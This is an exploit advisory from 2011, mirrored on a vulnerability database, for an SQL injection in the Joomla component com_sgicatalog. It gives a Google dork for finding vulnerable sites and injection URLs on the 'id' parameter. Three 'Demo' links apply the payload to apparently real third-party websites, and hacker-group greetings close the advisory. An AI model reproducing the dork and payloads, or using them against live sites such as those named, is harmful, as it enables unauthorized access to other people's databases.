Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27211
HistoryOct 24, 2011 - 12:00 a.m.

Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability

2011-10-2400:00:00
vulners.com
23

Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability

Google Dork: inurl:index.php?option=com_sgicatalog

Date: 2011-10-12

Author: BHG Security Center

Home: Http://black-hg.org

Software Link: http://joomlaapps.com/

Version: 1.x

Tested on: [Windows XP- Persian]

CVE : Webapps

[*] ExpLo!T :

http://127.0.0.1/index.php?option=com_sgicatalog&amp;task=view&amp;lang=en&amp;id=-416&#39;

http://127.0.0.1/index.php?option=com_sgicatalog&amp;task=view&amp;lang=en&amp;id=[SQLi]

http://127.0.0.1/path/index.php?option=com_sgicatalog&amp;task=view&amp;lang=en&amp;id=[SQLi]

[*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&amp;task=view&amp;lang=en&amp;id=-416&#39;

[*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&amp;task=view&amp;lang=en&amp;id=-416&#39;

[*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&amp;task=view&amp;lang=en&amp;id=-416&#39;

[+] Peace From #BHG

Vunl Component : com_sgicatalog

Error in file joomla Component (com_sgicatalog) Sql Injection

A vulnerable parameter $ en&id=

=================================BHG Security Center=====================================|

Greets To : |

                                                                                         |

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili |
cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y |
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ |
============================================================================================ |